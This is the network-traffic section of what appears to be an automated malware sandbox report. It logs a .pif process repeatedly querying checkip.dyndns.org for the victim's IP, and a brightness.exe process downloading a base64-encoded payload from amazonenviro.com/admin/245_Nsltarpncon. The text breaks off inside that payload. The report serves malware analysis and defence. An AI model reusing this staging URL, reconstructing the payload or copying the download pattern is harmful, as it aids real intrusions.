Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49883	132.226.247.73	80	8008	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 08:25:49.868696928 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 16, 2025 08:25:50.541404009 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:50 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49895	132.226.247.73	80	8008	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 08:25:51.306107998 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 16, 2025 08:25:51.978282928 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:51 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49906	132.226.247.73	80	8008	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 08:25:52.961635113 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 16, 2025 08:25:53.637414932 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:53 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49914	132.226.247.73	80	8008	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 08:25:54.262969971 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 16, 2025 08:25:54.939654112 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:54 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49915	132.226.247.73	80	8188	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 08:25:54.293574095 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 16, 2025 08:25:54.992731094 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:54 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 16, 2025 08:25:55.446940899 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 16, 2025 08:25:55.660913944 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:55 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 16, 2025 08:25:56.712418079 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 16, 2025 08:25:56.925709009 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:56 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49927	132.226.247.73	80	8008	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 08:25:55.578546047 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 16, 2025 08:25:58.252356052 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:58 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49941	132.226.247.73	80	8188	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 08:25:57.538264990 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 16, 2025 08:25:58.210769892 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:58 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49954	132.226.247.73	80	8188	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 08:25:58.859932899 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 16, 2025 08:25:59.550626040 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:59 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49955	132.226.247.73	80	8008	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 08:25:58.881367922 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 16, 2025 08:25:59.575124979 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:59 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49968	132.226.247.73	80	8188	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 08:26:00.145201921 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 16, 2025 08:26:01.846009016 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:26:01 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49969	132.226.247.73	80	8008	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 08:26:00.182109118 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 16, 2025 08:26:00.871831894 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:26:00 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49988	132.226.247.73	80	8188	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 08:26:02.462423086 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 16, 2025 08:26:03.134465933 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:26:03 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49996	132.226.247.73	80	8188	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 08:26:03.724006891 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 16, 2025 08:26:04.397170067 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:26:04 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	50008	132.226.247.73	80	8188	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 08:26:05.005145073 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 16, 2025 08:26:06.686503887 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:26:06 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	50025	132.226.247.73	80	8188	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 08:26:07.315654993 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 16, 2025 08:26:07.992047071 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:26:07 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49715	166.62.27.188	443	7368	C:\Windows\SysWOW64\brightness.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-16 07:25:25 UTC	171	OUT	GET /admin/245_Nsltarpncon HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: amazonenviro.com
2025-01-16 07:25:26 UTC	269	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:25 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Fri, 10 Jan 2025 16:03:39 GMT ETag: "2ca4707-bf154-62b5c3ce70cd3" Accept-Ranges: bytes Content-Length: 782676 Vary: Accept-Encoding
2025-01-16 07:25:26 UTC	7923	IN	Data Raw: 37 75 41 62 2b 4b 74 68 6d 62 75 45 65 38 7a 76 74 57 47 56 6b 6c 49 44 69 75 5a 4d 45 42 46 72 53 76 4f 66 31 6d 51 4b 43 35 68 42 45 48 69 39 4d 79 57 6e 50 68 69 42 75 45 59 4b 70 54 6f 54 67 4b 6f 37 45 59 30 74 46 33 65 79 4c 42 47 6d 4f 51 74 33 70 78 6f 2f 73 68 30 35 30 70 64 78 31 47 48 35 4c 55 58 71 37 46 48 41 45 6b 44 57 70 68 55 32 71 51 6f 7a 4d 76 2b 48 54 37 75 6e 73 2b 48 6a 58 43 79 7a 46 66 4e 72 73 55 6a 71 65 52 54 30 65 62 6c 4b 36 6e 4d 67 4b 64 4c 49 4c 42 68 31 5a 2f 2f 59 7a 4b 65 35 5a 33 72 6b 38 45 53 33 34 44 47 6d 35 79 6e 70 77 2b 42 45 6b 4d 6b 39 37 62 47 61 49 48 43 6f 5a 67 64 72 32 43 46 33 79 55 41 6d 4a 4a 53 78 38 65 4a 78 57 50 42 35 78 6b 4b 6d 63 31 38 44 66 72 73 32 6a 48 6f 6a 53 35 76 63 5a 34 36 79 54 31 6d Data Ascii: 7uAb+KthmbuEe8zvtWGVklIDiuZMEBFrSvOf1mQKC5hBEHi9MyWnPhiBuEYKpToTgKo7EY0tF3eyLBGmOQt3pxo/sh050pdx1GH5LUXq7FHAEkDWphU2qQozMv+HT7uns+HjXCyzFfNrsUjqeRT0eblK6nMgKdLILBh1Z//YzKe5Z3rk8ES34DGm5ynpw+BEkMk97bGaIHCoZgdr2CF3yUAmJJSx8eJxWPB5xkKmc18Dfrs2jHojS5vcZ46yT1m
2025-01-16 07:25:26 UTC	8000	IN	Data Raw: 4e 68 35 61 49 6b 6b 7a 48 42 51 70 79 54 31 6b 4a 64 6c 62 62 6b 6a 35 55 68 39 35 4a 69 66 56 55 68 50 51 64 6d 6a 38 49 71 38 79 52 50 4c 33 36 53 4e 52 77 31 6e 31 55 41 58 54 6c 55 4a 51 45 52 41 71 69 6e 63 4a 51 4d 2f 62 31 31 6e 61 75 39 51 70 6b 37 75 30 6d 4a 4e 44 37 67 77 63 53 37 79 2f 74 67 39 39 4e 64 7a 74 2f 65 50 42 31 42 57 78 74 66 65 46 70 51 37 47 47 4d 32 56 37 4e 46 2f 36 33 6c 50 49 63 76 6d 48 69 52 71 6d 66 49 54 48 46 59 30 4a 41 58 79 50 5a 38 76 70 4b 76 66 49 77 6c 5a 2b 79 65 41 77 75 78 6c 6b 57 38 42 56 4e 72 35 6d 7a 30 33 54 33 6c 30 55 51 7a 39 4a 64 68 4d 36 54 39 36 63 54 6e 59 41 4c 69 49 45 58 6e 62 62 57 6a 78 6c 76 34 77 4f 4f 43 66 69 38 6d 2b 32 2b 66 4c 73 41 45 72 5a 52 71 55 72 49 68 73 4c 73 68 36 68 71 35 Data Ascii: Nh5aIkkzHBQpyT1kJdlbbkj5Uh95JifVUhPQdmj8Iq8yRPL36SNRw1n1UAXTlUJQERAqincJQM/b11nau9Qpk7u0mJND7gwcS7y/tg99Ndzt/ePB1BWxtfeFpQ7GGM2V7NF/63lPIcvmHiRqmfITHFY0JAXyPZ8vpKvfIwlZ+yeAwuxlkW8BVNr5mz03T3l0UQz9JdhM6T96cTnYALiIEXnbbWjxlv4wOOCfi8m+2+fLsAErZRqUrIhsLsh6hq5
2025-01-16 07:25:26 UTC	8000	IN	Data Raw: 43 7a 34 2b 68 6c 45 6d 45 6a 6b 53 7a 79 6e 30 6a 4f 78 59 79 4f 35 70 67 59 30 6e 6d 6f 74 44 4d 62 4e 4e 4f 4a 43 62 31 4d 58 5a 48 58 62 52 52 54 44 4c 76 57 61 70 38 44 30 38 4b 38 65 4b 67 34 46 5a 74 30 38 63 54 78 58 76 64 77 32 52 7a 79 58 6f 6b 4a 74 64 31 67 5a 61 34 36 32 44 6c 66 2b 7a 75 38 57 49 6b 4a 6e 67 37 39 63 7a 4e 77 6f 69 45 68 49 63 57 6f 6c 54 61 7a 2b 53 6f 78 4f 70 67 70 30 73 4a 58 6e 59 59 38 66 53 57 2f 53 31 2f 50 4e 61 62 77 39 39 44 4b 50 42 42 6e 6e 4b 68 78 6c 67 67 70 68 77 70 74 2b 5a 66 75 2f 57 74 35 37 6a 72 63 6c 57 55 52 44 2b 5a 39 7a 6e 34 4a 61 4a 6a 76 51 58 2f 35 37 69 32 52 57 36 7a 32 2b 4a 6e 30 33 37 7a 4e 6d 6b 48 49 48 78 76 48 33 78 6a 42 56 7a 67 6b 33 49 31 72 59 71 2b 76 38 49 4d 6f 47 49 6a 50 66 Data Ascii: Cz4+hlEmEjkSzyn0jOxYyO5pgY0nmotDMbNNOJCb1MXZHXbRRTDLvWap8D08K8eKg4FZt08cTxXvdw2RzyXokJtd1gZa462Dlf+zu8WIkJng79czNwoiEhIcWolTaz+SoxOpgp0sJXnYY8fSW/S1/PNabw99DKPBBnnKhxlggphwpt+Zfu/Wt57jrclWURD+Z9zn4JaJjvQX/57i2RW6z2+Jn037zNmkHIHxvH3xjBVzgk3I1rYq+v8IMoGIjPf
2025-01-16 07:25:26 UTC	8000	IN	Data Raw: 6e 6d 63 68 6e 6b 56 55 73 58 53 59 6b 39 79 6f 55 4b 77 51 69 35 77 62 4e 71 57 4c 33 4d 7a 39 33 6b 6a 49 31 4c 69 51 6d 4e 33 72 65 65 58 36 41 6b 57 74 6d 47 42 48 6b 34 69 31 78 47 4c 57 63 6e 33 68 65 36 78 77 38 75 79 37 77 4a 43 5a 4d 4d 56 42 4b 6e 75 56 47 51 56 43 37 2b 4c 76 46 4b 4d 38 34 72 41 38 77 4e 4e 47 4b 46 62 57 65 30 42 31 4e 6c 4c 62 4a 6d 4d 77 4c 34 66 32 57 6d 30 49 41 79 56 31 6a 63 55 51 34 59 38 4a 61 78 4c 73 6d 4a 73 58 6e 57 71 70 61 68 4a 56 64 59 42 67 45 34 5a 55 72 70 61 42 6e 7a 4d 38 58 77 45 36 46 33 53 39 31 54 39 63 6f 53 5a 66 42 78 66 77 67 35 49 5a 75 52 55 4b 73 58 51 4a 57 4c 6f 35 33 47 37 74 5a 4f 46 78 48 6e 33 74 6b 6c 2b 37 58 6d 71 4e 53 54 6b 42 64 4a 43 59 4d 6d 4a 44 48 61 34 77 65 33 52 36 57 37 59 Data Ascii: nmchnkVUsXSYk9yoUKwQi5wbNqWL3Mz93kjI1LiQmN3reeX6AkWtmGBHk4i1xGLWcn3he6xw8uy7wJCZMMVBKnuVGQVC7+LvFKM84rA8wNNGKFbWe0B1NlLbJmMwL4f2Wm0IAyV1jcUQ4Y8JaxLsmJsXnWqpahJVdYBgE4ZUrpaBnzM8XwE6F3S91T9coSZfBxfwg5IZuRUKsXQJWLo53G7tZOFxHn3tkl+7XmqNSTkBdJCYMmJDHa4we3R6W7Y
2025-01-16 07:25:26 UTC	8000	IN	Data Raw: 78 51 38 77 59 2b 54 71 69 36 73 49 33 37 63 4e 56 4c 70 55 5a 63 46 50 43 6b 47 58 42 47 43 51 6d 54 54 6b 6c 68 49 4a 44 2b 47 4d 4d 57 73 72 49 4e 49 75 30 74 6e 69 76 52 48 72 50 65 49 2b 4a 73 69 45 62 54 67 45 68 37 59 57 4a 42 70 47 6b 63 4e 6e 55 64 39 45 68 78 64 42 73 73 63 6b 51 75 68 71 4f 79 6e 76 48 77 6d 43 63 6a 77 50 49 45 71 73 70 6e 35 67 7a 37 6c 46 76 4f 52 31 6e 59 35 6a 48 66 30 64 41 58 38 74 59 31 4b 2f 64 4b 4e 65 69 73 36 53 5a 57 69 57 78 6a 61 6e 6b 47 42 6b 52 2f 55 43 49 6f 2b 56 55 78 56 71 54 34 45 57 79 57 70 6a 30 33 47 6c 39 54 44 53 6e 48 57 74 6b 42 36 46 53 73 56 41 48 30 43 78 38 36 52 54 37 7a 6a 6f 5a 46 73 66 4a 5a 36 41 50 58 35 67 44 4d 63 77 45 30 45 41 65 51 36 